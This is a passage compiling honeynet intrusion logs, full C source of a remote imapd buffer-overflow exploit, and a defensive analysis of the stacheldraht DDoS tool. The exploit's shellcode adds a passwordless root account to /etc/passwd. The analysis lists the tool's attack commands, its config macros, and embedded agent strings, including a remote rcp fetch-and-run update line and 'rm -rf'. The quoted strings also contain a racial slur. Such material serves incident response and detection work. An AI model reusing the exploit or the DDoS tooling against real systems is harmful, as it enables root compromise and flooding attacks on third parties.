172.16.1.101:111 May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111 May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111 May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136 May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109 May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109 May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53 May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53 May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53 May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53 May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53 May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53 May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave) May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave) May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave) May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave) May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104 May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104 May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249 May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104 May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457 May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446 May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457 May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89 May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22 May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53 May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444 May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335 May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444 May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335 May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19 May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720 May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741 May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80 May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80 May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80 May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444 May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335 EoF imapd.c exploit - Know your enemy #1 /* This is the remote exploit of the hole in the imap daemon, for Linux. The instruction code is doing open(), write(), and close() system calls, and it adds a line root::0:0.. at the beggining of /etc/passwd (change to /etc/shadow if needed). The code needs to be self modifying since imapd turns everything to lowercase before it pushes it on the stack. The problem is that it rewrites the first line of passwd/shadow, therefore loosing the root password. I'm sorry, but I don't have time to add in the seek syscall. - Akylonius (aky@galeb.etf.bg.ac.yu) [1997] Modifications made on 5.1.97 to accept command line hostname, with 'h_to_ip' function that resolves it to an ip. - p1 (p1@el8.org) */ #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *h; struct sockaddr_in tmp; struct in_addr in; h = gethostbyname(hostname); if (h==NULL) { perror("Resolving the host. \n"); exit(-1); } memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } void banner(void) { system("clear"); printf("\nIMAP Exploit for Linux.\n"); printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n"); printf(" Modifications: p1 (p1@el8.org)\n"); } main(int argc, char **argv) { int fd; struct sockaddr_in sckdaddr; char *hostname; char buf[4092]; int i=8; char realegg[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff" "/etc/passwdxroot::0:0:r00t:/:/bin/bashx"; char *point = realegg; buf[0]='*'; buf[1]=' '; buf[2]='l'; buf[3]='o'; buf[4]='g'; buf[5]='i'; buf[6]='n'; buf[7]=' '; banner(); if (argc<2) { printf("\nUsage: %s \n\n", argv[0]); exit(-1); } hostname=argv[1]; while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */ buf[i++]=0x90; while(*point) buf[i++]=*(point++); buf[i++]=0x83; /* ebp */ buf[i++]=0xf3; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=0x88; /* ret adr */ buf[i++]=0xf8; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=' '; buf[i++]='b'; buf[i++]='a'; buf[i++]='h'; buf[i++]='\n'; buf[i++]=0x0; if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n"); sckdaddr.sin_port=htons(143); sckdaddr.sin_family=AF_INET; sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting. \n"); printf("hmm: \n"); getchar(); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); } The stacheldraht DoS analysis - Know your enemy #1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ========================================================================== The "stacheldraht" distributed denial of service attack tool ========================================================================== David Dittrich University of Washington Copyright 1999. All rights reserved. December 29, 1999 Introduction ------------ The following is an analysis of "stacheldraht", a distributed denial of service attack tool, based on source code from the "Tribe Flood Network" distributed denial of service attack tool. [Note that throughout this analysis, actual nicks, site names, and IP addresses have been sanitized.] Stacheldraht (German for "barbed wire") combines features of the "trinoo" distributed denial of service tool, with those of the original TFN, and adds encryption of communication between the attacker and stacheldraht masters and automated update of the agents. For more information on trinoo and TFN, see: http://staff.washington.edu/dittrich/misc/trinoo.analysis http://staff.washington.edu/dittrich/misc/tfn.analysis In late June and early July of 1999, one or more groups were installing and testing trinoo networks and waging medium to large scale denial of service attacks employing networks of over 2000 compromised systems. These attacks involved, and were aimed at, systems around the globe. In late August/early September of 1999, focus began to shift from trinoo to TFN, presumed to be the original code by Mixter. Then in late September/early October, a program that looked a lot like the TFN agent, known as "stacheldraht", began to show up on systems in Europe and the United States. These attacks prompted CERT to release Incident Note 99-04: http://www.cert.org/incident_notes/IN-99-04.html Like trinoo, stacheldraht is made up of master (handler) and daemon, or "bcast" (agent) programs. The handler/agent terminology was developed at the CERT Distributed System Intruder Tools workshop held in November 1999, and will be used in this analysis instead of the stacheldraht specific terms. It is highly recommended that the CERT workshop report be read as well. See: http://www.cert.org/reports/dsit_workshop.pdf There is some competition to stacheldraht in the form of Mixter's new version of TFN -- Tribe Flood Network 2000, or TFN2K -- released on December 21, 1999. For more on TFN2K, See: http://packetstorm.securify.com/distributed/ http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html Along with trinoo's handler/agent features, stacheldraht also shares TFN's features of distributed network denial of service by way of ICMP flood, SYN flood, UDP flood, and "Smurf" style attacks. Unlike the original TFN and TFN2K, the analyzed stacheldraht code does not contain the "on demand" root shell bound to a TCP port (it may be based on earlier TFN code than was made public by Mixter in mid-1999). One of the weaknesses of TFN was that the attacker's connection to the master(s) that control the network was in clear-text form, and was subject to standard TCP attacks (session hijacking, RST sniping, etc.) Stacheldraht deals with this by adding an encrypting "telnet alike" (stacheldraht term) client. Stacheldraht agents were originally found in binary form on a number of Solaris 2.x systems, which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd", "cmsd" and "ttdbserverd". They have been witnessed "in the wild" as late as the writing of this analysis. After publishing analyses of trinoo and Tribe Flood Network on Bugtraq in December 1999, an incident investigator at another institution provided stacheldraht source code that was obtained from a file cache in a stolen account. (I would like to thank this investigator, and also thank the folks at SecurityFocus for providing the open forum that allowed this to occur.) This analysis was done using this captured source code (labelled version 1.1, with source file modification dates ranging from 8/15/1999 to 10/17/1999). The Makefiles contain rules for Linux and Solaris, with the default being Linux (even though it appears that the code does not work very reliably on Linux). For the purposes of this analysis, all programs were compiled and run on Red Hat Linux 6.0 systems. As far as I am aware, the agent has been witnessed "in the wild" only on Solaris 2.x systems. One thing that may not have been clearly stated in the analyses done on trinoo and Tribe Flood Network is that distributed denial of service attacks are two phase attacks, with "victims" and "attackers" that are defined depending on your point of view. There is an initial mass-intrusion phase, in which automated tools are used to remotely root compromise large numbers (i.e., in the several hundred to several thousand ranges) and the distributed denial of service agents are installed on these compromised systems. These are primary victims (of system compromise.) None of these distributed denial of service tools have any features that facilitate compromising systems, and these automated tools are held closely by those groups who wrote them. The mass-instrusion phase is followed by the actual denial of service attack phase, in which these compromised systems which constitute the handlers and agents of the distributed attack network are used to wage massive denial of service attacks against one or more sites. These are secondary victims (of denial of service). [For an description of the methods used in the initial intrusion and network setup phases, see the analysis of the trinoo network, referenced in Appendix A.] Remember that modification of the source code can and would change any of the details of this analysis, such as prompts, passwords, commands, TCP/UDP port numbers, or supported attack methods, signatures, and features. The network: client(s)-->handler(s)-->agent(s)-->victim(s) ------------------------------------------------------------ The stacheldraht network is made up of one or more handler programs ("mserv.c") and a large set of agents ("leaf/td.c"). The attacker uses an encrypting "telnet alike" program to connect to and communicate with the handlers ("telnetc/client.c"). A stacheldraht network would look like this: +--------+ +--------+ | client | | client | +--------+ +--------+ | | . . . --+------+---------------+------+----------------+-- . . . | | | | | | +-----------+ +-----------+ +-----------+ | handler | | handler | | handler | +-----------+ +-----------+ +-----------+ | | | | | | . . . ---+------+-----+------------+---+--------+------------+-+-- . . . | | | | | | | | | | +-------+ +-------+ +-------+ +-------+ +-------+ | agent | | agent | | agent | | agent | | agent | +-------+ +-------+ +-------+ +-------+ +-------+ The attacker(s) control one or more handlers using encrypting clients. Each handler can control many agents. (There is an internal limit in the "mserv.c" code to 1000 agents. It is not know why 1000 was chosen, but the code does say that "1000 sockets are leet0.") The agents are all instructed to coordinate a packet based attack against one or more victim systems by the handler (referred to as an "mserver" or "master server" in the code.) Communication ------------- Client to handler(s): 16660/tcp Handler to/from agent(s): 65000/tcp, ICMP ECHO_REPLY Unlike trinoo, which uses UDP for communication between handlers and agents, or the original Tribe Flood Network, which uses ICMP for communication between the handler and agents, stacheldraht uses TCP and ICMP. Remote control of a stacheldraht network is accomplished using a simple client that uses symmetric key encryption for communication between itself and the handler. The client accepts a single argument, the address of the handler to which it should connect. It then connects using a TCP port (default 16660/tcp in the analyzed code). The attacker sees the following (if the proper password is given): --------------------------------------------------------------------------- # ./client 192.168.0.1 [*] stacheldraht [*] (c) in 1999 by ... trying to connect... connection established. -------------------------------------- enter the passphrase : sicken -------------------------------------- entering interactive session. ****************************** welcome to stacheldraht ****************************** type .help if you are lame stacheldraht(status: a!1 d!0)> --------------------------------------------------------------------------- The prompt shows the number of agents that are believed to be active ("a!") and dead ("d!") at the time. Using the command ".help" (let's assume, for the sake of argument, that we are lame) shows the supported command set: --------------------------------------------------------------------------- stacheldraht(status: a!1 d!0)>.help available commands in this version are: -------------------------------------------------- .mtimer .mudp .micmp .msyn .msort .mping .madd .mlist .msadd .msrem .distro .help .setusize .setisize .mdie .sprange .mstop .killall .showdead .showalive -------------------------------------------------- stacheldraht(status: a!1 d!0)> --------------------------------------------------------------------------- Commands -------- .distro user server Instructs the agent to install and run a new copy of itself using the Berkeley "rcp" command, on the system "server", using the account "user" (e.g., "rcp user@server:linux.bin ttymon") .help Prints a list of supported commands. .killall Kills all active agents. .madd ip1[:ip2[:ipN]] Add IP addresses to list of attack victims. .mdie Sends die request to all agents. .mdos Begins DoS attack. .micmp ip1[:ip2[:ipN]] Begin ICMP flood attack against specified hosts. .mlist List IP addresses of hosts being DoS attacked at the moment. .mping Pings all agents (bcasts) to see if they are alive. .msadd Adds a new master server (handler) to the list of available servers. .msort Sort out dead/alive agents (bcasts). (Sends pings and shows counts/percentage of dead/alive agents). .mstop ip1[:ip2[:ipN]] .mstop all Stop attacking specific IP addresses, or all. .msrem Removes a master server (handler) from the list of available servers. .msyn ip1[:ip2[:ipN]] Begin SYN flood attack against specified hosts. .mtimer seconds Set timer for attack duration. (No checks on this value.) .mudp ip1[:ip2[:ipN]] Begin UDP flood attack against specified hosts. (Trinoo DoS emulation mode.) .setisize Sets size of ICMP packets for flooding. (max:1024, default:1024). .setusize Sets size of UDP packets for flooding (max:1024, default:1024). .showalive Shows all "alive" agents (bcasts). .showdead Shows all "dead" agents (bcasts). .sprange lowport-highport Sets the range of ports for SYN flooding (defaults to lowport:0, highport:140). Password protection ------------------- After connecting to the handler using the client program, the attacker is prompted for a password. This password (default "sicken" in the analyzed code) is a standard crypt() encrypted password, which is then Blowfish encrypted using the passphrase "authentication" before being sent over the network to the handler (*all* communication between the agent and handler is Blowfish encrypted with this passphrase.) Like TFN, C macros ("config.h") define values used for expressing commands, replacement argument vectors ("HIDEME" and "HIDEKIDS") to conceal program names, etc.: --------------------------------------------------------------------------- #ifndef _CONFIG_H /* user defined values for the teletubby flood network */ #define HIDEME "(kswapd)" #define HIDEKIDS "httpd" #define CHILDS 10 /* These are like passwords, you might want to change them */ #define ID_SHELL 1 /* to bind a rootshell */ #define ID_ADDR 699 /* ip add request for the flood server */ #define ID_SETPRANGE 2007 /* set port range for synflood */ #define ID_SETUSIZE 2006 /* set udp size */ #define ID_SETISIZE 2005 /* set icmp size */ #define ID_TIMESET 2004 /* set the flood time */ #define ID_DIEREQ 2003 /* shutdown request of the masterserver */ #define ID_DISTROIT 2002 /* distro request of the master server */ #define ID_REMMSERVER 2001 /* remove added masterserver */ #define ID_ADDMSERVER 2000 /* add new masterserver request */ #define SPOOF_REPLY 1000 /* spoof test reply of the master server #define ID_TEST 668 /* test of the master server */ #define ID_ICMP 1055 /* to icmp flood */ #define ID_SENDUDP 2 /* to udp flood */ #define ID_SENDSYN 3 /* to syn flood */ #define ID_SYNPORT 4 /* to set port */ #define ID_STOPIT 5 /* to stop flooding */ #define ID_SWITCH 6 /* to switch spoofing mode */ #define ID_ACK 7 /* for replies to the client */ #define _CONFIG_H #endif --------------------------------------------------------------------------- As you can see, it is recommended that these be changed to prevent someone stumbling across the agents from knowing what values are used, thereby allowing them to execute agent commands. Fingerprints ------------ As with trinoo and Tribe Flood Network, the methods used to install the handler/agent will be the same as installing any program on a compromised Unix system, with all the standard options for concealing the programs and files (e.g., use of hidden directories, "root kits", kernel modules, etc.) One feature of stacheldraht not shared by trinoo or TFN is the ability to upgrade the agents on demand. This feature employs the Berkeley "rcp" command (514/tcp), using a stolen account at some site as a cache. On demand, all agents are instructed to delete the current program image, go out and get a new copy (either Linux- or Solaris-specific binary) from a site/account using "rcp", start running this new image with "nohup", and then exit. As for identifying the programs in the file system, there are (provided they are not edited out) some discernible strings. Strings embedded in the encrypting client ("client") include the following: ------------------------------------------------------------------------------ . . . connection closed. usage: ./sclient [*] stacheldraht [*] (c) in 1999 by ... trying to connect... unable to resolv %s unable to connect. connection established. -------------------------------------- enter the passphrase : authentication failed authentication failed. entering interactive session. ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ huhu . . . ------------------------------------------------------------------------------ Strings embedded in the handler ("mserv") include the following: ------------------------------------------------------------------------------ . . . %d.%d.%d.%d jbQ4yQaKLbFZc * mtimer reached * .quit exiting... you need to stop the packet action first. .help .version [*]stacheldraht[*] mserver version: 1.1 setusize setisize mdos mping mudp micmp msyn mstop mtimer madd mlist msort msadd msrem distro sprange killall showdead showalive add some bcasts mofo. killing all active childs... usage: .sprange example: .sprange 0-140 low port is : %i high port is : %i request was sent to the network. usage: .setusize current udp packet size is %ibytes udp packet size was set to %i bytes. udp packet size is too large. usage: .setisize current icmp packet size is %ibytes icmp packet size was set to %i bytes. icmp packet size is too large. sending mass die request... finished. .mudp starting trinoo emulation... removing useful commands. - DONE - available commands in this version are: -------------------------------------------------- .mtimer .mudp .micmp .msyn .msort .mping .madd .mlist .msadd .msrem .distro .help .setusize .setisize .mdie .sprange .mstop .killall .showdead .showalive usage: .distro remember : the distro files need to be executable! that means: chmod +x linux.bin , chmod +x sol.bin ;)) sending distro request to all bcasts.... user : %s rcp server : unable to resolve - %s unable to send distro request. request was sent, wait some minutes ;) usage: .msrem removing masterserver - failed. usage: .msadd adding masterserver - no packet action at the moment, sir. the followings ip(s) are getting packeted... -------------------------------------------- [*] stacheldraht [*] is packeting %d ips [*] stacheldraht [*] is packeting 1 ip .mstop all deleting from packetlist... %s - removed. %s - skipped. restarting packeting routines... niggahbitch usage: .madd adding to packetlist... %s - added. usage: .mtimer packet timer was set to %d seconds usage: .mstop or packeting stopped. usage: .msyn the net is already packeting. mass syn flooding %i floodrequests were sent to %i bcasts. usage: .micmp mass icmp bombing usage: .mudp mass udp bombing tR1n00(status: a!%i d!%i)> stacheldraht(status: a!%i d!%i)> waiting for ping replies... total bcasts : %d - 100% alive bcasts : 0 - 0% alive bcasts : %d - %d% dead bcasts : %d - %d% showing the alive bcasts... --------------------------- alive bcasts: %i showing the dead bcasts... -------------------------- dead bcasts: %i sorting out all the dead bcasts ------------------------------- %d dead bcasts were sorted out. bcasts [*]-stacheldraht-[*] - forking in the background... %i bcasts were successfully read in. 3.3.3.3 spoofworks ficken authentication failed ****************************** welcome to stacheldraht type .help if you are lame ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ huhu [0;35mTribe Flood Network (c) 1999 by [5mMixter . . . ------------------------------------------------------------------------------ Strings embedded in the agent ("td") include the following: ------------------------------------------------------------------------------ . . . %d.%d.%d.%d ICMP Error sending syn packet. tc: unknown host 3.3.3.3 mservers randomsucks skillz ttymon rm -rf %s rcp %s@%s:linux.bin %s nohup ./%s 1.1.1.1 127.0.0.1 lpsched no masterserver config found. using default ones. available servers: %i - working servers : 0 [*] stacheldraht [*] installation failed. found a working [*] stacheldraht [*] masterserver. masterserver is gone, looking for a new one sicken in.telne ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ . . . ------------------------------------------------------------------------------ When each agent starts up, it attempts to read a master server configuration file to learn which handler(s) may control it. This file is a list of IP addresses, encrypted using Blowfish, with a passphrase of "randomsucks". Failing to find a configuration file, there are one or more default handler IP addresses compiled into the program (shown above as "1.1.1.1" and "127.0.0.1" - these will obviously be changed). Once the agent has determined a list of potential handlers, it then starts at the beginning of the list of handlers and sends an ICMP ECHO_REPLY packet with an ID field containing the value 666 and data field containing the string "skillz". If the master gets this packet, it sends back an ECHO_REPLY packet with an ID field containing the value 667 and data field containing the string "ficken". (It should be noted that there appears to be a bug that makes the handler and agent send out some large, e.g., >1000 byte, packets. The handler and agent continue periodically sending these 666|skillz / 667|ficken packets back and forth. This would be one way of detecting agents/masters by passively monitoring these ICMP packets.) Seen with "sniffit" (modified per patches in the TFN analysis), these packets look like this: ------------------------------------------------------------------------------ ICMP message id: 10.0.0.1 > 192.168.0.1 ICMP type: Echo reply 45 E 00 . 04 . 14 . 01 . 0F . 00 . 00 . 40 @ 01 . E9 . 53 S 0A . 00 . 00 . 01 . C0 . A6 . 00 . 01 . 00 . 00 . B4 . 13 . 02 . 9A . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 73 s 6B k 69 i 6C l 6C l 7A z 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . . . . [60 lines of zeros deleted] 00 . 00 . 00 . 00 . ICMP message id: 192.168.0.1 > 10.0.0.1 ICMP type: Echo reply 45 E 00 . 04 . 14 . 04 . F8 . 00 . 00 . 40 @ 01 . E5 . 6A j C0 . A6 . 00 . 01 . 0A . 00 . 00 . 01 . 00 . 00 . CE . 21 ! 02 . 9B . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 66 f 69 i 63 c 6B k 65 e 6E n 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . . . . [60 lines of zeros deleted] 00 . 00 . 00 . 00 . ------------------------------------------------------------------------------ In addition to finding an active handler, the agent performs a test to see if the network on which the agent is running allows packets to exit with forged source addresses. It does this by sending out an ICMP ECHO_REPLY packet with a forged IP address of "3.3.3.3", an ID of 666, and the IP address of the agent system (obtained by getting the hostname, then resolving this to an IP address) in the data field of the ICMP packet. (Note that it also sets the Type of Service field to 7 on this particular packet, while others have a ToS value of 0.) If the master receives this packet, it replies to the IP address embedded in the packet with an ECHO_REPLY packet containing an ID of 1000 and the word "spoofworks" in the data field. If the agent receives this packet, it sets a spoof_level of 0 (can spoof all 32 bits of IP address). If it times out before receiving a spoof reply packet, it sets a spoof_level of 3 (can only spoof the final octet). These packets (as seen by tcpdump and tcpshow) are shown here: ------------------------------------------------------------------------------ # tcpdump icmp . . . 14:15:35.151061 3.3.3.3 > 192.168.0.1: icmp: echo request [tos 0x7] 14:15:35.177216 192.168.0.1 > 10.0.0.1: icmp: echo reply . . . # tcpdump -lenx icmp | tcpshow -cooked . . . ----------------------------------------------------------------- Packet 5 Timestamp: 14:08:04.171310 Source Ethernet Address: 00:10:1B:2B:3B:85 Destination Ethernet Address: 00:00:F0:00:69:78 Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x07 Datagram Length: 112 bytes Identification: 0x021C Flags: MF=off, DF=off Fragment Offset: 0 TTL: 255 Encapsulated Protocol: ICMP Header Checksum: 0x8408 Source IP Address: 3.3.3.3 Destination IP Address: 192.168.0.1 ICMP Header Type: echo-request Checksum: 0xF7FF Id: 0x0000 Sequence: 0x0000 ICMP Data ....................10.0.0.1......................................... ......... <*** Rest of data missing from packet dump ***> Packet 7 Timestamp: 14:08:04.197954 Source Ethernet Address: 00:00:C0:B6:84:E4 Destination Ethernet Address: 00:00:F0:00:69:78 Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 1044 bytes Identification: 0x198F Flags: MF=off, DF=off Fragment Offset: 0 TTL: 64 Encapsulated Protocol: ICMP Header Checksum: 0x3022 Source IP Address: 192.168.0.1 Destination IP Address: 10.0.0.1 ICMP Header Type: echo-reply Checksum: 0xD7DA Id: 0x03E8 Sequence: 0x0000 ICMP Data ....................spoofworks...................................... ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ ............................................................................ .................................... <*** Rest of data missing from packet dump ***> ------------------------------------------------------------------------------ There is also a code to perform an ID test, sending an ICMP ECHO_REPLY packet with an ID field value of 669, and the string "sicken\n" in the data field. This code is triggered if the handler is sent an ICMP ECHO_REPLY packet with an ID field containing the value 668. The program "gag" (see Appendix A) will allow you to probe for stacheldraht agents, which will show up like this (tcpdump and tcpshow as modified per patches in Appendix C): ------------------------------------------------------------------------------ Packet 1 Timestamp: 16:27:51.294727 Source Ethernet Address: 00:00:C0:B6:84:E4 Destination Ethernet Address: 00:00:F0:00:69:78 Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x10 Datagram Length: 40 bytes Identification: 0x3558 (13656) Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: ICMP Header Checksum: 0xA644 Source IP Address: 10.0.0.2 Destination IP Address: 198.168.0.1 ICMP Header Type: echo-reply Checksum: 0xC61F Id: 0x029C (668) Sequence: 0x0000 (0) ICMP Data gesundheit!.... ----------------------------------------------------------------- Packet 2 Timestamp: 16:27:51.340321 Source Ethernet Address: 00:10:1B:2B:3B:85 Destination Ethernet Address: 00:00:F0:00:69:78 Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 1044 bytes Identification: 0x1D13 (7443) Flags: MF=off, DF=off Fragment Offset: 0 TTL: 64 Encapsulated Protocol: ICMP Header Checksum: 0xFAA7 Source IP Address: 192.168.0.1 Destination IP Address: 10.0.0.2 ICMP Header Type: echo-reply Checksum: 0xB71F Id: 0x029D (669) Sequence: 0x0000 (0) ICMP Data ....................sicken .................................................................. .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... .......................................................................... ................................... <*** Rest of data missing from packet dump ***> ------------------------------------------------------------------------------ The script "gag" would be used like this. First, build a list of all suspect systems (e.g., do an "nmap" OS detection scan and find all Solaris and Linux systems on your network, or just scan the entire network and find all active IP addresses). Start "tcpdump" to capture all the potential replies for later use. Then start "gag", passing it this list of IP addresses to check. ------------------------------------------------------------------------------ # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669' # ./gag -v iplist sending packet [668/"gesundheit!"] to 192.168.0.1 sending packet [668/"gesundheit!"] to 192.168.0.30 sending packet [668/"gesundheit!"] to 192.168.1.2 sending packet [668/"gesundheit!"] to 192.168.1.5 sending packet [668/"gesundheit!"] to 192.168.2.10 sending packet [668/"gesundheit!"] to 192.168.3.6 . . . ------------------------------------------------------------------------------ To see the list of systems that returned ICMP ECHO_REPLY packets with ID 669, do the following: ------------------------------------------------------------------------------ # tcpdump -r stach.dump tcpdump: Filtering in user process 15:27:57.520094 192.168.0.1 > 10.0.0.1: icmp: echo reply (DF) 15:28:01.984660 192.168.2.10 > 10.0.0.1: icmp: echo reply (DF) ------------------------------------------------------------------------------ To actually see the packet contents to confirm "sicken\n" is included, you can do the following: ------------------------------------------------------------------------------ # tcpshow < stach.dump | egrep "Source IP|sicken" tcpdump: Filtering in user process Source IP Address: 198.162.0.1 ....................sicken Source IP Address: 192.168.2.10 ....................sicken ------------------------------------------------------------------------------ [There are more elegant ways of doing this, like writing a robust and feature filled C program with libnet (see Appendix B for reference), but there wasn't enough time before Y2K eve to get elegant. What the heck. Dirty works fine for me. I found three agents when I ran it "live."] The strings "skillz", "spoofworks", "sicken", "niggahbitch", and "ficken" -- all sent in ICMP data segments -- are not encrypted, so are visible in the data portion of ICMP ECHO_REPLY packets. The ID values 666, 667, 668, 669, and 1000 would also be identifiable in the packet flow using the above methods. The stacheldraht handler, which forks to handle commands and listen for ICMP packets, is seen on the system with "lsof" like this: ------------------------------------------------------------------------------ # lsof -c mserv COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME mserv 1072 root cwd DIR 3,3 2048 40961 /tmp/... mserv 1072 root rtd DIR 3,3 1024 2 / mserv 1072 root txt REG 3,3 50506 41421 /tmp/.../mserv mserv 1072 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so mserv 1072 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so mserv 1072 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so mserv 1072 root 0u CHR 136,4 6 /dev/pts/4 mserv 1072 root 1u CHR 136,4 6 /dev/pts/4 mserv 1072 root 2u CHR 136,4 6 /dev/pts/4 mserv 1072 root 3u sock 0,0 2143 can't identify protocol mserv 1073 root cwd DIR 3,3 2048 40961 